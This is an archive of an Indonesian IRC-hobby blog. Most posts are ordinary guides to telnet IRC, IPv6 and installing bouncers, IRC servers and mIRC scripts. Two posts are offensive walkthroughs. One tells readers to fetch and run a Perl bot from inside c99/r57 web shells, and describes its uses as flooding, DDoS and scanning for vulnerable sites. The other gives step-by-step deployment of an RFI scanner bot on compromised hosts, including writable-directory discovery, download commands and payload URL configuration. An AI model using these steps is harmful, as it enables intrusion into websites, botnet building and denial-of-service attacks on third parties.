Tampilkan postingan dengan label IRC Internet Relay Chat. Tampilkan semua postingan
Tampilkan postingan dengan label IRC Internet Relay Chat. Tampilkan semua postingan

Minggu, 12 Juni 2011

AnasKi CreW IRC Network Server

hello Viva AnasKi krn udh lama g update post akhirnya saya update lagi nih kli ni sya kan buat tutorial yg lebih mantap....

kali ini cukup dg server baru kami :D

irc.pasbar.com

untuk inginkan sebuah vhost bisa lansung menuju channel : #vhost
untuk bertanya silahkan masuk saja ke channel : #help dan tunggu respone dari kami

jika ada pertanyaan yg lain silahkan masuk ke channel anaski di irc.pasbar.com dan pv JFry_ jka ada waktu luang sya akan menjawab pertanyaan nya

jng lupa Free PsyBnc tapi hnya buat server anaski saja ya :D

Jumat, 28 Januari 2011

IRC MENGGUNAKAN TELNET CLIENT by Sandal

Waktu itu, saya sedang iseng di chanel #irchelp mencari tahu cara pembuatan script mIRC,
dan beberapa hal tentang IRC. Maklum, saya gak hobi ceting, paling cuma nongkrong doang.

Kebetulan saya mempunyai beberapa IRC client di rumah, yang saya jalankan pada localhost
menggunakan BIRCD (Beware IRC Daemon [Demit?]). Sehingga ntar saya bisa latihan tanpa harus
online. Soalnya, kompie di rumah gak bisa buat OL T_T

Lalu saya bertanya pada penghuni #irchelp (yang semuanya baik hati) tentang IRC client
yang imut yang mereka tahu. Lalu ada yang bertanya, "imut bagaimana maksudnya?"

Lalu saya jelaskan bahwa saya ingin IRC client yang ukurannya kecil.


you can use old version of mIRC. I have all.
um.. I mean, the client that I don't have to install
you can copy only the exe, the rest are yours :P
<@jaban> dal.net has the web version, you can use w/out any client


Jawaban mereka belum memuaskan keingintahuan saya. Iseng tiba-tiba terpikirkan kemungkinan
untuk cetting memakai telnet. Telnet yang saya maksud bukan melalui remote shell, tapi
menggunakan client telnet.

Lalu di warnet itu juga saya telnet ke DAL.net

C:\WINDOWS>telnet irc.dal.net 6667

Lalu muncul:

NOTICE AUTH :*** Checking Ident
NOTICE AUTH :*** No ident response

Blah.... trus gimana nih? Saya tuliskan perintah-perintah IRC yang saya tahu. Saya coba
ketik perintah HELP, siapa tahu Daemonnya baik hati mau memberitahu apa yang harus di-
lakukan.

NOTICE AUTH :*** Checking Ident
NOTICE AUTH :*** No ident response
HELP
:irc.dal.net 451 HELP :Register first.

Gludak! Tambah bingung nih. Saya coba perintah REGISTER, siapa tahu berhasil.

NOTICE AUTH :*** Checking Ident
NOTICE AUTH :*** No ident response
HELP
:irc.dal.net 451 HELP :Register first.
register sandal passwordku sandal@bonbon.net

Gak muncul apa-apa. Gimana nih????
Dalam kekalutan hati, tiba-tiba saya teringat om Google yang baik hati.
JREEENG!!!! Saya menemukannya. Coba deh ke free2code.com (apa .net ya?).

Inilah yang harus dilakukan untuk cetting menggunakan telnet. Kali ini saya menggunakan
localhost, biar gak perlu online :P Jangan lupa server IRC-nya dihidupin dulu.

C:\WINDOWS>telnet 127.0.0.1 6667
NOTICE AUTH :*** Checking Ident
NOTICE AUTH :*** No ident response

Kemudian masukkan data kita, dengan format:

USER [NAMA] [HOST] [HOST] [:NAMA ASELI]
user sandal localhost localhost :Tes Ajah

Pemakaian titik dua ":", hanya jika nama aseli lebih dari satu kata. Untuk host, baik
sedang online atau tidak, nama localhost tetep bisa dipakai kok. Saya sendiri belum
begitu mudeng tentang hal ini :D

Kok gak muncul apa-apa? Jangan khawatir, lanjut ke perintah berikutnya. Yaitu menentukan
nick yang akan dipakai.

NICK [YOURNICKNAME]
nick sandal

Jika berhasil, server akan nge-ping ke kita. Agar dianggep hidup, kita harus membalasnya
dengan pong.

PING :1100108772

Balas dengan:

PONG :1100108772 <-- angka sesuai yang muncul di ping.

Jika berhasil, maka akan muncul keterangan server tersebut, termasuk juga MOTD-nya
(Message Of The Day).

Berikut lengkapnya. Tanda [] saya gunakan untuk membedakan input dengan output.
Pada pemakaian sebenarnya, TIDAK menggunakan tanda tersebut. Jadi yang berada dalam "[]"
adalah apa yang harus kita tuliskan


C:\WINDOWS>telnet 127.0.0.1 6667
NOTICE AUTH :*** Checking Ident
NOTICE AUTH :*** No ident response
[user sandal localhost localhost :Namaku Sandal]
[nick sandal]
PING :615981036
[PONG :615981036]
:server.dian.sastro 001 sandal :Welcome to the Internet Relay Network sandal
:server.dian.sastro 002 sandal :Your host is server.dian.sastro, running version
beware1.5.7
:server.dian.sastro 003 sandal :This server was created Tue Jul 13 2004 at 20:36:07 GMT
:server.dian.sastro 004 sandal server.dian.sastro beware1.5.7 dgikoswx biklmnoprstv
:server.dian.sastro 005 sandal MAP SILENCE=15 WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG
CNOTICE MODES=6 MAXCHANNELS=10 MAXBANS=45 :are supported
by this server
:server.dian.sastro 005 sandal NICKLEN=9 TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#&
PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst CASEMAPPING=rfc1459
:are supported by this server
:server.dian.sastro 251 sandal :There are 1 users and 0 invisible on 1 servers
:server.dian.sastro 255 sandal :I have 1 clients and 0 servers
:server.dian.sastro NOTICE sandal :Highest connection count: 1 (1 clients)
:server.dian.sastro 422 sandal :MOTD File is missing
:server.dian.sastro NOTICE sandal :on 1 ca 1(4) ft 10(10)

Selanjutnya adalah menentukan channel yang akan kita gunakan. Perintah-perintah mIRC
pada umumnya bisa kita gunakan di sini. Bedanya adalah pada telnet, kita tidak menggunakan
tanda "/" (garis miring).

join #cinta
:sandal!~sandal@server.dian.sastro JOIN :#cinta
:server.dian.sastro 353 sandal = #cinta :@sandal
:server.dian.sastro 366 sandal #cinta :End of /NAMES list.

Tiba-tiba ada yang gabung dan menyapa kita.

:jeki!admin@server.dian.sastro JOIN :#cinta
:jeki!admin@server.dian.sastro PRIVMSG #cinta :hai sandal

Lalu kita balas. Format penulisan adalah: "PRIVMSG [#channel] [:isi pesan]".
Ingat, tanda ":" dipakai karena isi pesan lebih dari satu kata.

privmsg #cinta :hai juga jeki

Tiba-tiba di monitor muncul tulisan PING :server.dian.sastro, itu artinya server pengen
tau kita masih hidup apa enggak. Untuk itu harus dibales dengan PONG.

PING :server.dian.sastro
PONG :server.dian.sastro <-- sesuai yang muncul di PING

Pokoknya setiap muncul PING :******* kita harus membalasnya dengan PONG :*******.
Jika tidak, maka server akan menganggap kita udah mati dan memutuskan koneksi.

Bagaimana jika ingin melakukan query/pesan pribadi?
Hampir sama dengan mengirim pesan ke channel. Bedanya, nama channel diganti dengan nickname.

PRIVMSG jeki :apa kabar ente jek?

Well, itu saja yang bisa saya sampaikan, soale saya juga lom banyak tahu.
Silahkan dieksplorasi, agar lebih memahami.

Semoga bisa menambah pengetahuan teman-teman, dan bagi yang sudah menguasainya, mohon
pencerahan jika terdapat kesalahan dalam tulisan ini.

Cara Meng-aktifkan IPv6 , agar bisa Online lewat IRC

1. Daftarkan ip public di www.ipng.org.uk atau www.xs26.net
- Anda akan mendapatkan ipv6 dan ip gateway ipv6
misal ipv6 : 2001:618:4:2000::d56 dan
ipv6 gateway : 213.253.1.201

2. Aktifkan ipv6 pada shell anda :
#/sbin/modprobe ipv6
#/sbin/ifconfig sit0 up
#/sbin/ifconfig sit0 inet6 add 2001:618:4:2000::d56
#/sbin/route -A inet6 add ::/0 gw ::213.253.1.201 sit0
#/sbin/ifconfig sit0

Jika keluar seperti di bawah ini ber-arti ipv6 anda dah SIP :)

sit0 Link encap:IPv6-in-IPv4
inet6 addr: 2001:618:4:2000::d56/0 Scope:Global
inet6 addr: ::127.0.0.1/96 Scope:Unknown
inet6 addr: ::202.10.10.11/96 Scope:Compat
UP RUNNING NOARP MTU:1480 Metric:1
RX packets:310 errors:0 dropped:0 overruns:0 frame:0
TX packets:362 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:
RX bytes:60058 (58.6 Kb) TX bytes:35607 (34.7 Kb)

3. Test ipv6 anda dengan :

#/usr/sbin/ping6 2001:618:4:2000::d56 << punya nya XF86Setup

4. Install psybnc2.3.1 (support ipv6)
- Isi vhost dengan 2001:618:4:2000::d56

5. Masuk ke psybnc
- /addserver irc.aloha.net:6667
- /addsevver irc.ipv6.homelien.no:6667

sumber : ezine.echo.or.id

Senin, 03 Januari 2011

Cara membuat znc [ install znc ]

Znc adalah client BNC seperti psyBNC, sBNC yang membuat anda tetap tersambung ke jaringan walaupun anda tidak tersambung (disconect) ke IRC client, Cara kerjanya sama dengan beberapa skrip seperti TCL dan pengaturannya pun sangat mudah.

Dengan Fitur sbb :
Banyak User
Anda dapat menambah user dibawah satu proses. Sangat berguna untuk shell umum yang membatasi background process. Setiap user dapat tersambung ke satu jaringan IRC.

Banyak Klien
Terhubung ke user yang sama dengan beberapa aplikasi sekaligus sebanyak yang anda mau.

Pemutaran Kembali Buffer
Tetap mengetahui apapun yang terjadi dan saat itu terjadi sementara anda sedang tidak terhubung, timestamps akan selalu dicetak dan dapat dikonfigurasi secara manual.

Dukungan SSL
Enkripsi untuk port pendengar dan port koneksi ke server IRC. Jika sistem anda terdapat OpenSSL, ZNC akan secara otomatis mendukung koneksi SSL.

Bouncing DCC
Bouncing transparan untuk anonimitas DCC.

Partyline
Menggunakan modul global partyline, anda dapat terhubung ke channel dan privat dengan user lain yang berada didalam jaringan internal ZNC.

Administrasi Web
Menggunakan modul global webadmin, admin dapat menambah/menghapus/merubah setting user dan setting global dan selain admin dapat merubah setting mereka masing-masing.
Sumber Wiki Znc
Jika masih penasaran silahkan google :D
Langkah nya sebagai berikut :
Pertama2 unduh/download file yg di bawah
[root@ANASKI][:~]# wget http://biznetnetworks.dl.sourceforge.net/project/znc/znc/0.072/znc-0.072.tar.gz
Setelah selesai lakukan perintah ekstrak file dengan perintah :
[root@ANASKI][:~]# tar zxvf znc-0.072.tar.gz
kemudian masuk ke directory dg perintah :
[root@ANASKI][:~]# cd znc-0.072
Berikutnya lakukan Perintah untuk kompilasi paket dengan perintah :
[root@ANASKI][:~]# ./configure --disable-c-areas
[root@ANASKI][:~]# make
[root@ANASKI][:~]# make install
Kemudian membuat config, lakukan dg perintah :
[root@ANASKI][:~]# ./znc --makeconf
Sekarang cobalah untuk menjalankan sBNC dengan perintah:
[root@ANASKI][:~]# ./znc
Semoga bermanfaat dengan tutorialnya :D

Selasa, 28 Desember 2010

Cara membuat bot perl

Bot perl adalah sejenis sejenis bot yang bisa konek dengan menggunakan perl. sedangkan perl adalah sejenis pemprograman bahasa. untuk info perl silahkan google :D

Sebenarnya cara membuat bot perl itu gampang cara nya sebagai berikut :

  1. pertama anda masuk ke shell / c99 / r57 anda yang ada menggunakan bahasa pemprograman perl
  2. cukup Lakukan perintah di bawah ini :
cd /var/tmp;wget http://xXxX.com/XxXx/scan.txt
cd /var/tmp;chmod 755 scan.txt
cd /var/tmp;perl scan.txt
Script bot perl ada 2 macam :
  1. di kenal dengan nama bot perl yaitu bot yang digunakan untuk memenuhkan channel dan digunakan untuk flood, ddos, tsunami dll
  2. bot scan yang di gunakan untuk mencari celah web untuk di jadikan target/shell
ini script bot scan

Senin, 27 Desember 2010

Cara membuat tulisan besar di irc [ BIG Font ]

big font tulisan besar
ini contoh nya
Anda cuma cukup memasukan script di bawah ini ke dalam Romote Mirc
;----------------------------------
; BIG FONT
;----------------------------------

alias cmt {
if ($bigtext.unsupp($1-)) {
echo -ac info * Characters not supported by Big Text present in your message: $bigtext.unsupp($1-)
return
}
var %lia, %lib, %lic, %lid, %lie, %i 1, %text $strip($1-, bur), %colregex /^(\d\d?(?:,\d\d?)?)/

var %regex = /(?<= $+ $chr(3) $+ [0-9]| $+ $chr(3) $+ [0-9][0-9]) $+ $chr(44) $+ \d\d?/g, %res, %dummy = $regsub(%text, %regex, $null, %text) while (%i <= $len(%text)) { if ($mid(%text, %i, 1) == $chr(3)) { var %lia $+(%lia, $chr(3)), %lib $+(%lib, $chr(3)), %lic $+(%lic, $chr(3)), %lid $+(%lid, $chr(3)), %lie $+(%lie, $chr(3)) if ($mid(%text, $calc(%i + 1), 1) != $chr(32)) && ($regex(mtcol, $mid(%text, $calc(%i + 1), $mid(%text, $calc(%i + 1), 0)), %colregex)) { var %m $regml(mtcol, 1) var %lia %lia $+ %m, %lib %lib $+ %m, %lic %lic $+ %m, %lid %lid $+ %m, %lie %lie $+ %m inc %i $len(%m) } } else { tokenize 32 $bigtext.char($mid(%text, %i, 1)) var %lia $+(%lia, $1), %lib $+(%lib, $2), %lic $+(%lic, $3), %lid $+(%lid, $4), %lie $+(%lie, $5) ; if ($bigtext.kern($mid(%text, %i, 2))) { var %lia $+(%lia, .), %lib $+(%lib, .), %lic $+(%lic, .), %lid $+(%lid, .), %lie $+(%lie, .) ; } } inc %i } say $bigtext.format(%lia) say $bigtext.format(%lib) say $bigtext.format(%lic) say $bigtext.format(%lid) say $bigtext.format(%lie) } ; You may customize this alias however you want to. ; It is Big Text's font, used above. ; The return value consists of dots and X's, to denote ; unlit and lit points in the font, respectively; ; there are 5 tokens of the same length, each ; corresponding to a line in the 5-line output. ; Note how the . and X's look like the characters; ; you can use this to your advantage! alias -l bigtext.char { if ($1 === $chr(32)) || ($1 === $null) return $& ... $& ... $& ... $& ... $& ... if ($1 === $chr(160)) return $& ..... $& ..... $& ..... $& ..... $& ..... elseif ($1 == 0) return $& 12.XXXX.$& 12XX..XX$& 12XX.XXX$& 12XXX.XX$& 12.XXXX. elseif ($1 == 1) return $& .XXXX $& XX.XX $& ...XX $& ...XX $& ...XX elseif ($1 == 2) return $& XXXXX. $& ....XX $& ..XX.. $& XX.... $& XXXXXX elseif ($1 == 3) return $& XXXXX. $& ....XX $& .XXXX. $& ....XX $& XXXXX. elseif ($1 == 4) return $& .....XXX. $& ...XX.XX. $& .XX...XX. $& XXXXXXXXX $& ......XX. elseif ($1 == 5) return $& XXXXX $& XX... $& XXXX. $& ...XX $& XXXX. elseif ($1 == 6) return $& .XXXX. $& XX.... $& XXXXX. $& XX..XX $& .XXXX. elseif ($1 == 7) return $& XXXXXX $& ...XX. $& ..XX.. $& .XX... $& XX.... elseif ($1 == 8) return $& .XXXX. $& XX..XX $& .XXXX. $& XX..XX $& .XXXX. elseif ($1 == 9) return $& .XXXX. $& XX..XX $& .XXXXX $& ....XX $& .XXXX. elseif ($1 == A) return $& .XXXX. $& XX..XX $& XXXXXX $& XX..XX $& XX..XX elseif ($1 == B) return $& XXXXX. $& XX..XX $& XXXXX. $& XX..XX $& XXXXX. elseif ($1 == C) return $& .XXXX. $& XX..XX $& XX.... $& XX..XX $& .XXXX. elseif ($1 == D) return $& XXXX.. $& XX.XX. $& XX..XX $& XX..XX $& XXXXX. elseif ($1 == E) return $& XXXXX $& XX... $& XXXX. $& XX... $& XXXXX elseif ($1 == F) return $& XXXXX $& XX... $& XXXX. $& XX... $& XX... elseif ($1 == G) return $& .XXXX. $& XX.... $& XX.XXX $& XX..XX $& .XXXXX elseif ($1 == H) return $& XX...XX $& XX...XX $& XXXXXXX $& XX...XX $& XX...XX elseif ($1 == I) return $& XXXX $& .XX. $& .XX. $& .XX. $& XXXX elseif ($1 == J) return $& ....XX $& ....XX $& ....XX $& XX..XX $& .XXXX. elseif ($1 == K) return $& XX..XX $& XX.XX. $& XXXX.. $& XX.XX. $& XX..XX elseif ($1 == L) return $& XX... $& XX... $& XX... $& XX... $& XXXXX elseif ($1 == M) return $& XX....XX $& XXX..XXX $& XXXXXXXX $& XX.XX.XX $& XX....XX elseif ($1 == N) return $& XX..XX $& XXX.XX $& XXXXXX $& XX.XXX $& XX..XX elseif ($1 == O) return $& .XXXX. $& XX..XX $& XX..XX $& XX..XX $& .XXXX. elseif ($1 == P) return $& XXXXX. $& XX..XX $& XXXXX. $& XX.... $& XX.... elseif ($1 == Q) return $& .XXXX.. $& XX..XX. $& XX..XX. $& XX..XX. $& .XXXXXX elseif ($1 == R) return $& XXXXX. $& XX..XX $& XXXXX. $& XX..XX $& XX..XX elseif ($1 == S) return $& .XXXX. $& XX.... $& .XXXX. $& ....XX $& XXXXX. elseif ($1 == T) return $& XXXXXX $& ..XX.. $& ..XX.. $& ..XX.. $& ..XX.. elseif ($1 == U) return $& XX..XX $& XX..XX $& XX..XX $& XX..XX $& .XXXX. elseif ($1 == V) return $& XX....XX $& XX....XX $& .XX..XX. $& ..XXXX.. $& ...XX... elseif ($1 == W) return $& XX...XX $& XX...XX $& XX.X.XX $& XXXXXXX $& .XX.XX. elseif ($1 == X) return $& XX...XX $& .XX.XX. $& ..XXX.. $& .XX.XX. $& XX...XX elseif ($1 == Y) return $& XX..XX $& XX..XX $& .XXXX. $& ..XX.. $& ..XX.. elseif ($1 == Z) return $& XXXXXX $& ...XX. $& ..XX.. $& .XX... $& XXXXXX elseif ($1 == $chr(35)) return $& .XX..XX. $& XXXXXXXX $& .XX..XX. $& XXXXXXXX $& .XX..XX. elseif ($1 == ') return $& .XX $& XX. $& ... $& ... $& ... elseif ($1 == ") return $& XX..XX $& XX..XX $& ...... $& ...... $& ...... elseif ($1 == +) return $& ...... $& ..XX.. $& XXXXXX $& ..XX.. $& ...... elseif ($1 == =) return $& ...... $& XXXXXX $& ...... $& XXXXXX $& ...... elseif ($1 == -) return $& ...... $& ...... $& XXXXXX $& ...... $& ...... elseif ($1 == _) return $& ...... $& ...... $& ...... $& ...... $& XXXXXX elseif ($1 == ¯) return $& XXXXXX $& ...... $& ...... $& ...... $& ...... elseif ($1 == °) return $& .XXX. $& XX.XX $& .XXX. $& ..... $& ..... elseif ($1 == :) return $& .. $& XX $& .. $& XX $& .. elseif ($1 == !) return $& XX $& XX $& XX $& .. $& XX elseif ($1 == ?) return $& XXX. $& ..XX $& .XX. $& .... $& .XX. elseif ($1 == .) return $& .. $& .. $& .. $& .. $& XX elseif ($1 == /) return $& ....XX $& ...XX. $& ..XX.. $& .XX... $& XX.... elseif ($1 == \) return $& XX.... $& .XX... $& ..XX.. $& ...XX. $& ....XX elseif ($1 == $chr(40)) return $& ....X $& ..X.. $& X.... $& ..X.. $& ....X elseif ($1 == $chr(41)) return $& X.... $& ..X.. $& ....X $& ..X.. $& X.... elseif ($1 == $chr(37)) return $& XX..XX $& ...XX. $& ..XX.. $& .XX... $& XX..XX elseif ($1 == [) return $& XXXXX $& XX... $& XX... $& XX... $& XXXXX elseif ($1 == ]) return $& XXXXX $& ...XX $& ...XX $& ...XX $& XXXXX elseif ($1 == |) return $& .XX. $& .XX. $& .XX. $& .XX. $& .XX. elseif ($1 == <) return $& ....XX $& ..XX.. $& XX.... $& ..XX.. $& ....XX elseif ($1 == >) return $&
XX.... $&
..XX.. $&
....XX $&
..XX.. $&
XX....
elseif ($1 == ¸) return $&
.... $&
.... $&
.XX. $&
..XX $&
XXX.
elseif ($1 == ,) return $&
... $&
... $&
XXX $&
.XX $&
XX.
}


; Returns all unsupported characters within a Big Text message
; Supported characters are a-z, space, digits, #'"+=?:!?./\()%-[]<>|?,
alias bigtext.unsupp {
var %res, %dummy = $regsub($1-, /[]a-z 0-9# $+ $chr(44) $+ '+=?:!?./\\()%[|<>_?"?-]/igS, $null, %res)
return %res
}

; Returns $true if a space should be added between two characters,
; or $false if not.
; Note: This is here only for aesthetic purposes. :)
alias bigtext.kern {
var %res $true
if ($regex($1-, /^(.|[_GDSQL-]T|[TPFVY7/"]J|T\.|L[1Y\\"]|[LTK<[]-|-[]>%\\]|S1|T4|\?\.|\.\?|[467L\\]?|?[J/]|L'|\/\/|\\\\|?J|[_?]?|[?T_]_|>\.|\.<)$/i)) %res = $false return %res } ; Takes an input string of the form: ; .XX..XX....XX.XX.XXXXX ; And formats it for display. alias bigtext.format { var %res, %i 1, %previous 0, %current, %curcolor, %colregex /^(\d\d?(?:,\d\d?)?)/ while (%i <= $len($1-)) { if ($mid($1-, %i, 1) == $chr(3)) { if ($regex(mtcol, $mid($1-, $calc(%i + 1), $mid($1-, $calc(%i + 1), 0)), %colregex)) { if ($gettok($regml(mtcol, 1), 1, 44) != %curcolor) { %curcolor = $gettok($regml(mtcol, 1), 1, 44) if (%i != 1) && ($mid($1-, $calc(%i - 1), 1) == X) %res = %res $+ $chr(15) } inc %i $len($regml(mtcol, 1)) } elseif (%curcolor) { %curcolor = if (%i != 1) && ($mid($1-, $calc(%i - 1), 1) == X) %res = %res $+ $chr(15) } } else { %current = $iif($mid($1-, %i, 1) == ., 0, 1) if (%previous != %current) { %previous = %current if (%curcolor) { if (%current) %res = %res $+ $chr(3) $+ %curcolor $+ , $+ %curcolor else %res = %res $+ $chr(3) } else %res = %res $+ $chr(22) } %res = %res $+ $chr(160) } inc %i } return %res } menu channel { Big Font: { set %q.t $$?="What to Say?:" | if (%q.t != $null) { cmt %q.t } | unset %q.t } }

Rabu, 22 Desember 2010

Cara membuat Version Mirc

Cara membuat Version Sendiri mirc dengan script

alias ver {
/echo 4 $dll(motfv3.dll,motfv,Load)
/echo 4 $dll(motfv3.dll,motfv,Sync)
}
alias uver {
/echo 4 $dll(motfv3.dll,motfv,Unload)
}
on 1:connect:{ .ver }

ctcp *:MOTFV:{
.ctcpreply $nick VERSION $me FixIRC by Fixedsys (http://www.anaski.co.cc/)
}


Masukan Text yang di atas ke dlm script mirc dengan cara "
  1. tekan tombol pd keyboard Alt+R atau bisa dengan cara pada menu mirc pilih tools, di dlam tools pilih script editor
  2. pada menu script editor pilih remote
  3. File kemudian New
  4. dan masukan texts yg di atas
penambahan script silahkan di download di ANASKI's File Download

Cara membuat sBNC [ install sBNC ]

shroudBNC atau sering jg di sebut sBNC adalah klien BNC seperti psyBNC, yang membuat anda tetap tersambung ke jaringan walaupun anda tidak tersambung ke IRC client, Cara kerjanya sama dengan beberapa skrip seperti TCL dan pengaturannya pun sangat mudah.

Langkah nya sebagai berikut :
Pertama2 unduh/download file yg di bawah
[root@ANASKI][:~]# wget http://mirror.shroudbnc.info/sbnc-1.1.tar.gz

Setelah selesai lakukan perintah ekstrak file dengan perintah :
[root@ANASKI][:~]# tar -zvxf sbnc-1.1.tar.gz

kemudian masuk ke directory dg perintah :
[root@ANASKI][:~]# cd sbnc-1.1

Berikutnya lakukan Perintah untuk kompilasi paket dengan perintah :
[root@ANASKI][:~]# ./configure
[root@ANASKI][:~]# gmake
[root@ANASKI][:~]# make install

Kemudian, lakukan perintah :
[root@ANASKI][:~]# ./conftool

shroudBNC1.1 $Revision: 371 $ - an object-oriented IRC bouncer
*** configuration generator

This utility will automatically generate a suitable configuration
for you once it has asked you some questions.
1. Which port should the bouncer listen on? [9000] 60613 --> isikan port
2. What should the first user's name be? ANASKI --> isikan identd
3. Please enter a password for the first user: ANASKI --> isikan password
Writing config...

Sekarang cobalah untuk menjalankan sBNC dengan perintah:
[root@ANASKI][:~]# ./sbnc

shroudBNC loader
Loading shroudBNC from ./sbnc.so
Tue Dec 21 07:06:13 2010 Log system initialized.
shroudBNC1.1 $Revision: 371 $ - an object-oriented IRC bouncer
Tue Dec 21 07:06:13 2010 Could not create listener port

Semoga bermanfaat

Minggu, 17 Oktober 2010

Tutorial membuat PSYBNC dengan shell legal [ Install PsyBNC ]

psyBNC adalah suatu program IRC (Internet Relay Chat). psy adalah kependekan dari psychoid, suku pencipta aslinya. Sedangkan BNC adalah kependekan dari "bounce" (Melambung). Jadi psyBNC adalah suatu program yang digunakan untuk proses "pelambungan" melalui sebuah server untuk menyamarkan ip "nama host" (vhost).

Sabtu, 20 Maret 2010

Tutorial Membuat BotScan RFI

anope Ircd adalah sebuah mesin service Ircd

Saya mau menjelaskan sedikit cara mencari target/shell melalui bot scanner RFI di irc. saya anggap anda sudah mengerti sedikit mengenai command linux dan injection web. disini saya menggunakan shell c99 yg Version FeeLCoMz sebagai panduannya.
Mari Kita Mulai Tutor nya

  1. Simpan Script yang saya post di blog saya FeeLCoMz RFI Scanner kemudian setelah di simpan ambil script FeeLScaNz.txt edit admin nya, anda juga bisa langsung menggunakan milik saya
  2. Masuk ke shell anda atau c99
  3. cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”
  4. jika ga ada, langsung aja menuju direktori /tmp ato /var/tmp
  5. wget script bot dari web saya atau dari tempat anda. saya pake contoh Yg milik saya, jadi commandnya “wget http://acuplod.110mb.com/FeeLScaNz.tar.gz”
  6. jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya “lwp-download http://acuplod.110mb.com/FeeLScaNz.tar.gz”
  7. kalo ga bisa juga, pakailah fitur uploadnya karena saya menggunakan r57 ato c99. dan uploadlah script botnya dengan fitur tersebut. jika belum punya filenya, downloat aja dari http://acuplod.110mb.com/FeeLScaNz.tar.gz
  8. upload yg script FeelScaNz.txt Saya anggap script tersebut udah di upload, maka jalankan commandnya “perl [nama file] [channel tdk pake #] [server] [port]" contoh : perl FeelScaNz.txt anaski irc.anaski.co.cc 6667
  9. Jika berhasil, di shell anda akan keluar tulisan.. dan di bot akan join ke channel anda
  10. Untuk mengetahui command yang dipakai, ketik .help
  11. Silahkan dipergunakan sebaik mungkin

    Ket :
    Ini adalah tutor untuk pembuatan bot scan RFI pada web hasil inject
    Tutor ini hanya berjalan pada shell yg hidup perl dan socket
    Semua command di atas tanpa tanda petik dua (”)

Semoga Berhasil

FeeLCoMz RFI Scanner

########################################
## FeeLCoMz RFI Scanner Bot v4.9 ##
## By FaTaLisTiCz_Fx ##
## © Agu-Nov 2008, FeeLCoMz Community ##
########################################

##[ KONFIGURASI URL ]##
my $fx29id = "http://Fx29ID.txt??"; #Fx29ID (Simple) / (Advanced) --> Di edit url nya
my $fx29id2 = "http://Fx29ID2.txt??"; #Fx29ID (Advanced)
--> Di edit url nya
my $fx29sh = "http://Fx29Sh??"; #Fx29Sh (Optional)
--> Di edit url nya
my $bypass = "http://google.php?"; #Google Bypasserz (Optional) 
--> Di edit url nya

##[ KONFIGURASI SOURCE ]##
my $mysite = "http://?"; #Path to Sources URL (Optional) 
--> Di edit url nya
my $spread = $mysite."http://spreed.txt"; #Fx29Spreadz (Optional) 
--> Di edit url nya
my $joomlaz = $mysite."bugz/joomla.txt"; #Joomla's Bugs List (Required for Joomla RFI Scanner)

DownLoad : [ Lengkap ]

Jumat, 19 Maret 2010

Cara membuat Unreal IRCD di Linux [ Install Unreal IRCD ]

Pertama2 silahkan download file dengan perintah :
[root@ANASKI][:~]# wget http://www.unrealircd.com/downloads/Unreal3.2.8.1.tar.gz

kemudian lakukan meng exstrak dg perintah :
[root@ANASKI][:~]# tar -zxvf Unreal3.2.8.1.tar.gz

kemudian masuk ke dalam directory :
[root@ANASKI][:~]# cd Unreal3.2.8.1

lakukan proses kompilasi paket dengan perintah :
[root@ANASKI][:~]# ./Config

Installing 17% <-- tekan enter seterusnya sampai 100% -maka ketik :
[root@ANASKI][:~]# make

proses instalasi akan berjalan, untuk menyempurnakan proses compile ircd, lanjutkan dengan menjalankan perintah :
[root@ANASKI/Unreal3.2.8.1][:~]# make install

- ok, skrg ircd udh selesai, tinggal di run,edit terlebih dahulu file unrealircd.conf - lakukan perintah :
[root@ANASKI/Unreal3.2.8.1][:~]# pico unrealircd.conf

- setelah selesai, skrg tinggal mengedit file oper.conf nya, lakukan perintah :
[root@ANASKI/Unreal3.2.8.1][:~]# pico oper.conf

- terakhir, skrg tinggal mengedit file connect.conf nya, lakukan perintah :
[root@ANASKI/Unreal3.2.8.1][:~]# pico connect.conf

nah, lakukan proses edit, bagian admin serta server yg mau di gunakan, akan lebih mudah mengedit menggunakan program winscp. -baiklah, saya anggap sudah selesai di edit, skrg tinggal menggunakan jurus run :
[root@ANASKI/Unreal3.2.8.1][:~]# ./unreal start

Install Anope IRCD Services

IRC -> Internet Relay Chat

IRC adalah singkatan dari Internet Relay Chat. Secara kasar, IRC adalah media untuk berbicara real time dengan orang lain di Internet. IRC bekerja seperti radio CB, hanya saja ente mengetikkan semuanya apa yang ingin bicarakan pada keyboard dan ente dapat berbicara dengan semua orang. ente pun dapat melihat ketikan orang lain pada layar monitor.

Internet Relay Chat diciptakan pada tahun ‘80an hasil dari penyempurnaan komunikasi antar UNIX. Ketika berkomunukasi antar dua orang atau lebih secara hampir bersamaan. IRC adalah jaringan server yang menrelai percakapan dari pengguna yang terkoneksi pada server tersebut. Jaringan IRC tersebar di seluruh dunia. Siapa saja, di mana saja, dengan mempergunakan internet koneksi dapat berpartisipasi untuk ikut.

Banyak sekali channels diskusi pada IRC. ente dapat bergabung pada diskusi setelah ente memilih nick name dan bergabung di channel. Jika ingin mencoba IRC, ente dapat download MIRC dari official sites mereka.
Untuk memulai, tahap standar adalah sebagai berikut:

Semua perintah diawali dengan tanda slash ('/')
Pertama gabung server (banyak server di dunia ini), misalnya /server irc.anaski.co.cc
Pilih nick name misal: /nick FIXEDSYS
Untuk melihat daftar channel yang ada, ketik /list
Gabung channel, misalnya /join #anaski
Bicara deh....


saya anjurkan pake yg asli aja :
mirc.com

Cara membuat Eggdrop [ Install Eggdrop ]

Eggdrop merupakan supported IRC Bot yang terbaik (menurutku), paling populer, dan paling advanced, sedangkan IRC Bot sendiri kebanyakan adalah berfungsi untuk membantu management channel IRC.Banyak macamnya sesuai fungsinya seperti Bot proteksi, Bot Game, Bot Zodiak, Bot News, Bot Cuaca, Bot Log Channel, dan sebagainya (beberapa company irc hosting di Indonesia menyediakan untuk disewa bagi yang ga mau ribet membuatnya).
Tapi bagi yang menginginkan Bot Proteksi sebetulnya disarankan buat meng-create sendiri karena bagaimana settingnya bisa disesuaikan dengan kebutuhan channel masing-masing yang jelas berbeda. Bagi pemula, sebelum membuat eggdrop atau IRC Bot perlu tau dong apa aja yang dibutuhkan. Seperti membuat kue, membuat kerajinan, dan lainnya eggdrop atau IRC Bot juga butuh sesuatu sebagai dasar adonannya
